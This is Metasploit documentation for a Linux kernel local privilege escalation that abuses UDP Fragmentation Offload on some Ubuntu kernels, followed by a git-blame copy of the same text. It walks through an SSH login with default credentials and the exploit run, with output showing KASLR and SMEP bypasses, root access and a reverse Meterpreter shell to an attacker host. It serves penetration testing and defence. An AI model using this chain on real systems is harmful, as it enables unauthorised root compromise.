documentation/modules/exploit/linux/local/ufo_privilege_escalation.md

## Vulnerable Application

This module attempts to gain root privileges on Linux systems by abusing UDP Fragmentation Offload (UFO).
  
The bug was initially introduced in October 2005 and patched in September 2017, potentially affecting a large
number of kernels; however this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels 
4.4.0-21 <= 4.4.0-89 (Trusty), and 4.4.0-81 <= 4.8.0-58 (Xenial), including Linux distros based on Ubuntu
such as Linux Mint.

### Disabling SMAP

[Original Instructions](https://github.com/rapid7/metasploit-framework/pull/9884#issuecomment-389607805)

To disable `SMAP` on a system, edit `/etc/default/grub` and add `nosmap` to the `GRUB_CMDLINE_LINUX_DEFAULT` line.
Next, `sudo update-grub`, and reboot.

To verify SMAP has been disabled, `grep smap /proc/cpuinfo` and nothing should be returned.

## Verification Steps

  1. Start msfconsole
  2. Get a shell on a vulnerable box
  3. Do: ```use exploit/linux/local/ufo_privilege_escalation```
  4. Do: ```set session [#]```
  5. Do: ```run```
  6. You should get a root shell.

## Options

  **WritableDir**

  A folder we can write files to.  Defaults to /tmp

  **COMPILE**
  
  If we should live compile on the system, or drop pre-created binaries.  Auto will determine if gcc/libs are installed to compile live on the system.  Defaults to Auto

## Compiled Executables

The module makes use of a pre-compiled exploit executable to be
used when `gcc` is not available on the target host for live compiling,
or `COMPILE` is set to `False`.

The executable was cross-compiled with [musl-cross](https://s3.amazonaws.com/muslcross/musl-cross-linux-6.tar).

```bash
./x86_64-linux-musl-gcc -o exploit.out -pie -static exploit.c
```

## Scenarios

### Ubuntu 14.04.5 4.4.0-31-generic x64 Desktop

#### Initial Access

```
resource (ubuntu.rb)> use auxiliary/scanner/ssh/ssh_login
resource (ubuntu.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (ubuntu.rb)> set username ubuntu
username => ubuntu
resource (ubuntu.rb)> set password ubuntu
password => ubuntu
resource (ubuntu.rb)> exploit
[+] 2.2.2.2:22 - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare) Linux ubuntu-desktop-14 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:07:32 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (1.1.1.1:45819 -> 2.2.2.2:22) at 2018-04-03 20:58:32 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

#### Escalate

In this scenario, gcc is installed so we can live compile on the system.

```
msf5 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/ufo_privilege_escalation 
msf5 exploit(linux/local/ufo_privilege_escalation) > set verbose true
verbose => true
msf5 exploit(linux/local/ufo_privilege_escalation) > set session 1
session => 1
msf5 exploit(linux/local/ufo_privilege_escalation) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf5 exploit(linux/local/ufo_privilege_escalation) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] Linux kernel version 4.4.0-31-generic is vulnerable
[*] Checking if SMAP is enabled ...
[+] SMAP is not enabled
[+] System architecture x86_64 is supported
[+] Unprivileged user namespaces are permitted
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Writing '/tmp/.4UnI1EFL.c' (28356 bytes) ...
[*] Max line length is 65537
[*] Writing 28356 bytes in 2 chunks of 57414 bytes (octal-encoded), using printf
[*] Next chunk is 43454 bytes
[*] Writing '/tmp/.S6G2g9rnUj' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Launching exploit ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (857352 bytes) to 2.2.2.2
[*] [.] starting
[*] [.] checking kernel version
[*] [.] kernel version '4.4.0-31-generic' detected
[*] [~] done, version looks good
[*] [.] checking SMEP and SMAP
[*] [~] done, looks good
[*] [.] setting up namespace sandbox
[*] [~] done, namespace sandbox set up
[*] [.] KASLR bypass enabled, getting kernel addr
[*] [.] trying /proc/kallsyms...
[*] [.] trying /boot/System.map-4.4.0-31-generic...
[*] [-] open/read(/boot/System.map-4.4.0-31-generic)
[*] [.] trying syslog...
[*] [~] done, kernel addr:   ffffffff81000000
[*] [.] commit_creds:        ffffffff8109d760
[*] [.] prepare_kernel_cred: ffffffff8109da40
[*] [.] SMEP bypass enabled, mmapping fake stack
[*] [~] done, fake stack mmapped
[*] [.] executing payload ffffffff8104516a
[*] [~] done, should be root now
[*] [.] checking if we got root
[*] [+] got r00t ^_^
[*] Cleaning up /tmp/.S6G2g9rnUj and /tmp/.4UnI1EFL ...
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:60474) at 2018-07-21 13:35:49 -0400

meterpreter > sysinfo
Computer     : 2.2.2.2
OS           : Ubuntu 14.04 (Linux 4.4.0-31-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```
lpe ufo 2018-04-17 20:39:59 -04:00			`## Vulnerable Application`

			`This module attempts to gain root privileges on Linux systems by abusing UDP Fragmentation Offload (UFO).`

patch up docs 2018-07-21 14:00:29 -04:00			`The bug was initially introduced in October 2005 and patched in September 2017, potentially affecting a large`
			`number of kernels; however this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels`
patch up docs 2018-07-21 14:06:57 -04:00			`4.4.0-21 <= 4.4.0-89 (Trusty), and 4.4.0-81 <= 4.8.0-58 (Xenial), including Linux distros based on Ubuntu`
patch up docs 2018-07-21 14:00:29 -04:00			`such as Linux Mint.`
lpe ufo 2018-04-17 20:39:59 -04:00
add smap disabling instructions 2018-07-21 14:20:24 -04:00			`### Disabling SMAP`

			`[Original Instructions](https://github.com/rapid7/metasploit-framework/pull/9884#issuecomment-389607805)`

			To disable `SMAP` on a system, edit `/etc/default/grub` and add `nosmap` to the `GRUB_CMDLINE_LINUX_DEFAULT` line.
			Next, `sudo update-grub`, and reboot.

			To verify SMAP has been disabled, `grep smap /proc/cpuinfo` and nothing should be returned.

lpe ufo 2018-04-17 20:39:59 -04:00			`## Verification Steps`

			`1. Start msfconsole`
			`2. Get a shell on a vulnerable box`
			3. Do: ```use exploit/linux/local/ufo_privilege_escalation```
			4. Do: ```set session [#]```
			5. Do: ```run```
			`6. You should get a root shell.`

			`## Options`

			`WritableDir`

			`A folder we can write files to. Defaults to /tmp`

			`COMPILE`

			`If we should live compile on the system, or drop pre-created binaries. Auto will determine if gcc/libs are installed to compile live on the system. Defaults to Auto`

add musl-cross info 2018-07-21 14:22:27 -04:00			`## Compiled Executables`

			`The module makes use of a pre-compiled exploit executable to be`
			used when `gcc` is not available on the target host for live compiling,
			or `COMPILE` is set to `False`.

			`The executable was cross-compiled with [musl-cross](https://s3.amazonaws.com/muslcross/musl-cross-linux-6.tar).`

			```bash
			`./x86_64-linux-musl-gcc -o exploit.out -pie -static exploit.c`
			```

lpe ufo 2018-04-17 20:39:59 -04:00			`## Scenarios`

			`### Ubuntu 14.04.5 4.4.0-31-generic x64 Desktop`

			`#### Initial Access`

			```
			`resource (ubuntu.rb)> use auxiliary/scanner/ssh/ssh_login`
			`resource (ubuntu.rb)> set rhosts 2.2.2.2`
			`rhosts => 2.2.2.2`
			`resource (ubuntu.rb)> set username ubuntu`
			`username => ubuntu`
			`resource (ubuntu.rb)> set password ubuntu`
			`password => ubuntu`
			`resource (ubuntu.rb)> exploit`
			`[+] 2.2.2.2:22 - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare) Linux ubuntu-desktop-14 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:07:32 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '`
			`[*] Command shell session 1 opened (1.1.1.1:45819 -> 2.2.2.2:22) at 2018-04-03 20:58:32 -0400`
			`[*] Scanned 1 of 1 hosts (100% complete)`
			`[*] Auxiliary module execution completed`
			```

			`#### Escalate`

			`In this scenario, gcc is installed so we can live compile on the system.`

			```
patch up docs 2018-07-21 14:00:29 -04:00			`msf5 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/ufo_privilege_escalation`
			`msf5 exploit(linux/local/ufo_privilege_escalation) > set verbose true`
lpe ufo 2018-04-17 20:39:59 -04:00			`verbose => true`
patch up docs 2018-07-21 14:00:29 -04:00			`msf5 exploit(linux/local/ufo_privilege_escalation) > set session 1`
lpe ufo 2018-04-17 20:39:59 -04:00			`session => 1`
patch up docs 2018-07-21 14:00:29 -04:00			`msf5 exploit(linux/local/ufo_privilege_escalation) > set lhost 1.1.1.1`
lpe ufo 2018-04-17 20:39:59 -04:00			`lhost => 1.1.1.1`
patch up docs 2018-07-21 14:00:29 -04:00			`msf5 exploit(linux/local/ufo_privilege_escalation) > exploit`

lpe ufo 2018-04-17 20:39:59 -04:00			`[!] SESSION may not be compatible with this module.`
			`[*] Started reverse TCP handler on 1.1.1.1:4444`
patch up docs 2018-07-21 14:00:29 -04:00			`[+] Linux kernel version 4.4.0-31-generic is vulnerable`
			`[*] Checking if SMAP is enabled ...`
			`[+] SMAP is not enabled`
			`[+] System architecture x86_64 is supported`
			`[+] Unprivileged user namespaces are permitted`
lpe ufo 2018-04-17 20:39:59 -04:00			`[+] gcc is installed`
patch up docs 2018-07-21 14:00:29 -04:00			`[*] Live compiling exploit on system...`
			`[*] Writing '/tmp/.4UnI1EFL.c' (28356 bytes) ...`
lpe ufo 2018-04-17 20:39:59 -04:00			`[*] Max line length is 65537`
patch up docs 2018-07-21 14:00:29 -04:00			`[*] Writing 28356 bytes in 2 chunks of 57414 bytes (octal-encoded), using printf`
			`[*] Next chunk is 43454 bytes`
			`[*] Writing '/tmp/.S6G2g9rnUj' (207 bytes) ...`
lpe ufo 2018-04-17 20:39:59 -04:00			`[*] Max line length is 65537`
patch up docs 2018-07-21 14:00:29 -04:00			`[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf`
			`[*] Launching exploit ...`
			`[*] Transmitting intermediate stager...(106 bytes)`
			`[*] Sending stage (857352 bytes) to 2.2.2.2`
lpe ufo 2018-04-17 20:39:59 -04:00			`[*] [.] starting`
patch up docs 2018-07-21 14:00:29 -04:00			`[*] [.] checking kernel version`
lpe ufo 2018-04-17 20:39:59 -04:00			`[*] [.] kernel version '4.4.0-31-generic' detected`
patch up docs 2018-07-21 14:00:29 -04:00			`[*] [~] done, version looks good`
lpe ufo 2018-04-17 20:39:59 -04:00			`[*] [.] checking SMEP and SMAP`
			`[*] [~] done, looks good`
			`[*] [.] setting up namespace sandbox`
			`[*] [~] done, namespace sandbox set up`
			`[*] [.] KASLR bypass enabled, getting kernel addr`
patch up docs 2018-07-21 14:00:29 -04:00			`[*] [.] trying /proc/kallsyms...`
			`[*] [.] trying /boot/System.map-4.4.0-31-generic...`
			`[*] [-] open/read(/boot/System.map-4.4.0-31-generic)`
			`[*] [.] trying syslog...`
			`[*] [~] done, kernel addr: ffffffff81000000`
lpe ufo 2018-04-17 20:39:59 -04:00			`[*] [.] commit_creds: ffffffff8109d760`
			`[*] [.] prepare_kernel_cred: ffffffff8109da40`
			`[*] [.] SMEP bypass enabled, mmapping fake stack`
			`[*] [~] done, fake stack mmapped`
			`[*] [.] executing payload ffffffff8104516a`
			`[*] [~] done, should be root now`
			`[*] [.] checking if we got root`
			`[*] [+] got r00t ^_^`
patch up docs 2018-07-21 14:00:29 -04:00			`[*] Cleaning up /tmp/.S6G2g9rnUj and /tmp/.4UnI1EFL ...`
			`[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:60474) at 2018-07-21 13:35:49 -0400`
lpe ufo 2018-04-17 20:39:59 -04:00
			`meterpreter > sysinfo`
			`Computer : 2.2.2.2`
			`OS : Ubuntu 14.04 (Linux 4.4.0-31-generic)`
			`Architecture : x64`
			`BuildTuple : i486-linux-musl`
			`Meterpreter : x86/linux`
patch up docs 2018-07-21 14:00:29 -04:00			`meterpreter >`
lpe ufo 2018-04-17 20:39:59 -04:00			```